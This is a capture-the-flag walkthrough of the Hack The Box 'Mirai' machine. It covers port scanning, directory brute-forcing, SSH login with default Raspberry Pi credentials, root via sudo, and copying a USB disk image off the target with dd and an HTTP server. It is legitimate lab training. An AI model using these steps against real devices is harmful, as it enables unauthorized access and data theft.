Mirai HTB

10.10.10.48

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.48 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open

22,53,80,1255,32400,32469

Lets run a more in-depth scan of the targets ports

sudo nmap -sCV -p22,53,80,1255,32400,32469 10.10.10.48 -oA nmap_results

results

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1255/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
|_http-favicon: Plex
|_http-title: Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

we have

Looks like we have two web servers running port 80, 32400
DNS is open, maybe zone transfer
port 1255 we have UPnP (Universal Plug and Play): A networking protocol that allows compliant devices to automatically set port forwarding rules for themselves, version 1.0.5.13

First lets perform a zone transfer DNS PORT 53

come back to this

Lets check out the webserver on port 80

we are bought to a plank page

we can confirm the lighttpd version 1.4.35

Lets run feroxbuster and see if we can find anything else

feroxbuster -u http://10.10.10.48 -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txt

We find `http://10.10.10.48/admin/

Worth looking into when we finish enumerating

,v3.1.4,v3.1,v2.10

Not sure what this is

**HTTP PORT 32400**

when we navigate to http://10.10.10.48:32400 we can see the following

Lets see if we can perform some feroxbusting and find anything

feroxbuster -u http://10.10.10.48:32400 -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txt

looks like there may be security inplace to prevent directory busting as we are getting 200s for everything

Lets create an account an inspect the request with burp

unable to create account, the application seems to be having password complications

So far our best bet is the pi-hole interface we found within the http://10.10.10.48

What is pi-hole: A network wide ad blocker designed to function as a DNS sinkhole, it primary purpose is to block any unwanted content
Most of the time these pi-hole interface's would be associated with a raspberry pie, meaning there could be a raspberry pie IoT device in the network
- After a quick google search we find that the IoT device (Raspberry pi) often has SSH connection to the target server and the default credentials are pi: raspberry

Lets see if we can SSH into the machine

ssh pi@10.10.10.48

we now have access as pi on the target machine

When we check our sudo privileges we can see the following

sudo -l

we can simple sudo su and we are root

Now trying to find the root

when we cat out the root.txt we see the following

cat /root/root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...

Looking in the /media/usb we can see the following note

Lets see if we can create a image of the usb stick and enumerate it on our local machine

dd if=/dev/sdb bs=1M > /home/pi/disk.img
cd /home/pi
python3 -m http.server 9001

Now we can download it onto our local machine

wget http://10.10.10.48:9001/disk.img

Now we can run strings and see if we can find anything interesting

strings disk.img

from here we can find the flag

PreviousFriendzoned HTB NextNetworked HTB

Last updated 1 year ago

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA) | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA) | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA) |_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519) 53/tcp open domain dnsmasq 2.76 | dns-nsid: |_ bind.version: dnsmasq-2.76 80/tcp open http lighttpd 1.4.35 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: lighttpd/1.4.35 1255/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) 32400/tcp open http Plex Media Server httpd |_http-favicon: Plex |_http-title: Unauthorized | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-cors: HEAD GET POST PUT DELETE OPTIONS 32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel